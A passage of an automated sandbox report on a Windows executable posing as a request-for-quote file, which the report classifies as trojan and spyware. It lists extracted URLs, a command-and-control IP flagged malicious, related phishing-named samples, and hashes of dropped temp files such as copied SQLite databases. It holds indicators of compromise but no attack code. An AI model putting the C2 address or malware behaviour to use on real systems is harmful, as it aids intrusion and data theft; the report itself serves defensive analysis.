                                                                      		unknown
                                                                      https://get.adobRFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.random.org/sequences/RFQ - FYKS - 06052022.exefalse
                                                                        		high
                                                                        https://ac.ecosia.org/autocomplete?q=RFQ - FYKS - 06052022.exe, 00000001.00000003.331452674.0000000006AD0000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.363415606.00000000036EA000.00000004.00000800.00020000.00000000.sdmp, tmpDB5A.tmp.1.dr, tmp24A5.tmp.1.dr, tmp4753.tmp.1.dr, tmp772C.tmp.1.dr, tmp5367.tmp.1.dr, tmpCE18.tmp.1.dr, tmp91E8.tmp.1.dr, tmp10BE.tmp.1.dr, tmp8CE9.tmp.1.dr, tmp5BF2.tmp.1.dr, tmpD0C9.tmp.1.dr, tmpF824.tmp.1.drfalse
                                                                          		high
                                                                          http://185.222.58.90:1RFQ - FYKS - 06052022.exe, 00000001.00000002.363207933.00000000035D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://service.real.com/realplayer/security/02062012_player/en/RFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://schemas.xmlsoap.org/ws/2004/08/addressingRFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://support.google.com/chrome/?p=plugin_shockwaveRFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.363415606.00000000036EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://185.222.58.90:179108RFQ - FYKS - 06052022.exe, 00000001.00000002.362669805.00000000032B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://forms.reaRFQ - FYKS - 06052022.exe, 00000001.00000002.363293291.000000000367E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://tempuri.org/Endpoint/GetUpdatesResponseRFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://tempuri.org/Endpoint/EnvironmentSettingsResponseRFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RFQ - FYKS - 06052022.exe, 00000001.00000003.331452674.0000000006AD0000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.363415606.00000000036EA000.00000004.00000800.00020000.00000000.sdmp, tmpDB5A.tmp.1.dr, tmp24A5.tmp.1.dr, tmp4753.tmp.1.dr, tmp772C.tmp.1.dr, tmp5367.tmp.1.dr, tmpCE18.tmp.1.dr, tmp91E8.tmp.1.dr, tmp10BE.tmp.1.dr, tmp8CE9.tmp.1.dr, tmp5BF2.tmp.1.dr, tmpD0C9.tmp.1.dr, tmpF824.tmp.1.drfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/soap/actor/nextRFQ - FYKS - 06052022.exe, 00000001.00000002.362542232.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RFQ - FYKS - 06052022.exe, 00000001.00000003.331452674.0000000006AD0000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.363415606.00000000036EA000.00000004.00000800.00020000.00000000.sdmp, tmpDB5A.tmp.1.dr, tmp24A5.tmp.1.dr, tmp4753.tmp.1.dr, tmp772C.tmp.1.dr, tmp5367.tmp.1.dr, tmpCE18.tmp.1.dr, tmp91E8.tmp.1.dr, tmp10BE.tmp.1.dr, tmp8CE9.tmp.1.dr, tmp5BF2.tmp.1.dr, tmpD0C9.tmp.1.dr, tmpF824.tmp.1.drfalse
                                                                                      		high

                                                                                      World Map of Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public IPs

                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      185.222.58.90
                                                                                      		unknownNetherlands
                                                                                      		51447ROOTLAYERNETNLtrue

                                                                                      General Information

                                                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                      Analysis ID:634392
                                                                                      Start date and time: 26/05/202202:31:082022-05-26 02:31:08 +02:00
                                                                                      Joe Sandbox Product:CloudBasic
                                                                                      Overall analysis duration:0h 9m 49s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Sample file name:RFQ - FYKS - 06052022.exe
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                      Number of analysed new started processes analysed:27
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • HDC enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.spyw.expl.evad.winEXE@4/27@2/1
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 100%
                                                                                      HDC Information:
                                                                                      • Successful, ratio: 0% (good quality ratio 0%)
                                                                                      • Quality average: 70.5%
                                                                                      • Quality standard deviation: 6.5%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 95%
                                                                                      • Number of executed functions: 128
                                                                                      • Number of non-executed functions: 5
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .exe
                                                                                      • Adjust boot time
                                                                                      • Enable AMSI

                                                                                      Warnings

                                                                                      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 104.26.13.31, 104.26.12.31, 172.67.75.172
                                                                                      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, go.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      02:32:43API Interceptor112x Sleep call for process: RFQ - FYKS - 06052022.exe modified

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      185.222.58.90MACHINE SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                                                      • 185.222.58.90:17910/
                                                                                      MACHINE SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                                                      • 185.222.58.90:17910/

                                                                                      Domains

                                                                                      No context

                                                                                      ASNs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      ROOTLAYERNETNLMZvvoqAUnu.exeGet hashmaliciousBrowse
                                                                                      • 45.137.22.35
                                                                                      MACHINE SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                                                      • 185.222.58.90
                                                                                      MACHINE SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                                                      • 185.222.58.90
                                                                                      New Order.exeGet hashmaliciousBrowse
                                                                                      • 185.222.57.178
                                                                                      e_Receipt.pdf.exeGet hashmaliciousBrowse
                                                                                      • 45.137.22.163
                                                                                      View Payment.exeGet hashmaliciousBrowse
                                                                                      • 45.137.22.35
                                                                                      SecuriteInfo.com.Variant.Babar.54324.15185.exeGet hashmaliciousBrowse
                                                                                      • 185.222.57.79
                                                                                      PAYMENT.exeGet hashmaliciousBrowse
                                                                                      • 185.222.58.237
                                                                                      Payment.exeGet hashmaliciousBrowse
                                                                                      • 45.137.22.122
                                                                                      Quotation.xlsxGet hashmaliciousBrowse
                                                                                      • 185.222.58.51
                                                                                      Order Package.xlsxGet hashmaliciousBrowse
                                                                                      • 185.222.58.244
                                                                                      ORDER SV-033764.exeGet hashmaliciousBrowse
                                                                                      • 185.222.57.155
                                                                                      ORDER_SV-033764.exeGet hashmaliciousBrowse
                                                                                      • 185.222.57.155
                                                                                      ORDER SV-033764.exeGet hashmaliciousBrowse
                                                                                      • 185.222.57.155
                                                                                      ORDER SV-033764.exeGet hashmaliciousBrowse
                                                                                      • 185.222.57.155
                                                                                      Hzb1l180P6.exeGet hashmaliciousBrowse
                                                                                      • 45.137.22.227
                                                                                      bankreportt.exeGet hashmaliciousBrowse
                                                                                      • 185.222.57.252
                                                                                      SecuriteInfo.com.W32.AIDetectNet.01.11996.exeGet hashmaliciousBrowse
                                                                                      • 185.222.57.252
                                                                                      SecuriteInfo.com.W32.AIDetectNet.01.20266.exeGet hashmaliciousBrowse
                                                                                      • 185.222.57.252
                                                                                      aaaaaaaa.docxGet hashmaliciousBrowse
                                                                                      • 185.222.58.48

                                                                                      JA3 Fingerprints

                                                                                      No context

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ - FYKS - 06052022.exe.log

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):617
                                                                                      Entropy (8bit):5.347480285514745
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:Q3La/hz92n4M9tDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKharkvoDLI4MWuCv:MLU84qpE4Ks2wKDE4KhK3VZ9pKhIE4Ks
                                                                                      MD5:4E2C52C54E01A6E1B1A9AE5F1DFEA744
                                                                                      SHA1:7768B945A7B642D21C1946F817C4CE91AD81BBD7
                                                                                      SHA-256:C694679BDC1CEACC4E7F1732892773372D6548C71625579BE6A8BE8F39EC95AE
                                                                                      SHA-512:23E707DB6ECBE26936723C43039DA8F57364CA24AF0448B14D8705518F5D94AD3A24A54A5522A9A1FEC8EC9868F738A8A72295F00FCC8CF02E9F5421CC86A7CC
                                                                                      Malicious:false
                                                                                      Reputation:moderate, very likely benign file
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

                                                                                      C:\Users\user\AppData\Local\Temp\tmp10BE.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                      Category:modified
                                                                                      Size (bytes):73728
                                                                                      Entropy (8bit):1.1874185457069584
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                      MD5:72A43D390E478BA9664F03951692D109
                                                                                      SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                      SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                      SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmp1D5.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.792852251086831
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                      MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                      SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                      SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                      SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmp1F80.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.701704028955216
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:t3GWl91lGAalI86LPpWzUkxooDp2Eb6PEA7lhhzhahpmvYMp+wq2MseSnIrzv:t2Wl91lGAad/xoo12e6MyF4/jMp+t2Mh
                                                                                      MD5:5F97B24D9F05FA0379F5E540DA8A05B0
                                                                                      SHA1:D4E1A893EFD370529484B46EE2F40595842C849E
                                                                                      SHA-256:58C103C227966EC93D19AB5D797E1F16E33DCF2DE83FA9E63E930C399E2AD396
                                                                                      SHA-512:A175FDFC82D79343CD764C69CD6BA6B2305424223768EAB081AD7741AA177D44A4E6927190AD156D5641AAE143D755164B07CB0BBC9AA856C4772376112B4B24
                                                                                      Malicious:false
                                                                                      Reputation:moderate, very likely benign file
                                                                                      Preview:BNAGMGSPLOQNKLVQWYYWYGDTNIHHPSGKYBNBNGFSZGYYFUVNSOYTAMZPOIOKMFFWDJIYCJGTWZSMXADBSJDEKDTPXDVYBIZFLSTFISYXAKAYQWPLDFAWXXNTSVHRLCINNTRJHMBFQAQBHFRSHDDRJZGIFSOFSRODXCWFIUZRXRQSOCPSXKXNEHLQYKIBJRTMMHJOIZSWESTHTXPULAPGLZHBOLMPQWYSWWOGRJQGYWDWWZMHZMTDMRWBSPIXHCFFOHTJSOAULKIFZVXPTYEBTBEXGQNBQAECQOJGHTKIAXUJLSLPBKTTRORROLNTKPDPOMSZBBLUYFRZXYZSVBGBEMGTACDCBJNXKAMZMCYEWGKSUENLKBJSZIPKQGYXMJTJXBELNVMAZHRUESZSTWROIUXLLMQPYLVQYLCOMOCGPSMJQGILSDDRUUXDRUCCVECNPLWHJLTHCPBZIKDUNRJMJIOQOCHVVNIQFFXFKFHTCVEEAXHTLJMWIUAWAMHGIGQCQJZGXBEDCRRZCNVYKCPWVJCRXIGXZYJENNARSZZREAOODIGZVBXFPAHTZNKNQHLNNETJICOVQGFLQSGSLCOYMPYDSGOPNUXAMCIJBJPJBAABYHKBKWCUAXUHNOCSSTHZYJXPLMFVJQAJDDSNEVXLRUYEQEKUKUIAOQAQJMNLHOUFLFUDMCWRNYNNLOACVSDXDNNBOGQOYGOZTWUOFZYLZQXJEGPQNQFLLILMQUJLCLUOOAOAQRCWMGKHGFJRPSFVQPCSCUDFVYSGDQIHJWSUDEAMVIANGMMFSJJTPNRYYSJYDFLUXJZGSYAAUHOEPMQIZZRSZDCXHRCIPUERSVKWEBDJCXEWWKPAHBVZESVEWPJTYRBKLHQRRPGDGQPGTNNFRMWNTGWIZDBPSGFQDFZWTVLRAOKRBHWFHBPZUBSCFBAMHEWXUIUXMKHPOCNYWNKSRYBQKSUWJLJRNBFNMTDBSZDXVFSLPDQEDCNYELVD

                                                                                      C:\Users\user\AppData\Local\Temp\tmp24A5.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                      Category:dropped
                                                                                      Size (bytes):73728
                                                                                      Entropy (8bit):1.1874185457069584
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                      MD5:72A43D390E478BA9664F03951692D109
                                                                                      SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                      SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                      SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmp2EBF.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.792852251086831
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                      MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                      SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                      SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                      SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmp2F4C.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.69422273140364
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
                                                                                      MD5:A686C2E2230002C3810CB3638589BF01
                                                                                      SHA1:4B764DD14070E52A2AC0458F401CDD5724E714FB
                                                                                      SHA-256:38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
                                                                                      SHA-512:1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
                                                                                      Malicious:false
                                                                                      Preview:SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

                                                                                      C:\Users\user\AppData\Local\Temp\tmp4753.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                      Category:dropped
                                                                                      Size (bytes):73728
                                                                                      Entropy (8bit):1.1874185457069584
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                      MD5:72A43D390E478BA9664F03951692D109
                                                                                      SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                      SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                      SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmp5367.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                      Category:dropped
                                                                                      Size (bytes):73728
                                                                                      Entropy (8bit):1.1874185457069584
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                      MD5:72A43D390E478BA9664F03951692D109
                                                                                      SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                      SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                      SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmp5BF2.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                      Category:dropped
                                                                                      Size (bytes):73728
                                                                                      Entropy (8bit):1.1874185457069584
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                      MD5:72A43D390E478BA9664F03951692D109
                                                                                      SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                      SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                      SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmp6731.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.6969712158039245
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:zDLHcjI8IQ6sNUYzo1jfRRMF6zzC3ZzNTWx7M00:zDL4ImUYzebRR66C3Z0JMR
                                                                                      MD5:31CD00400A977C512B9F1AF51F2A5F90
                                                                                      SHA1:3A6B9ED88BD73091D5685A51CB4C8870315C4A81
                                                                                      SHA-256:E01ADE9C56AF2361A5ADC05ADE2F5727DF1B80311A0FDC6F15B2E0FFFACC9067
                                                                                      SHA-512:0521ED245FA8F46DE9502CD53F5A50B01B4E83983CC6D9DE0CF02E54D2825C1C26A748CC27E24633DA1171CE0309323235ECF7EB536D4058214D7618794CF2FA
                                                                                      Malicious:false
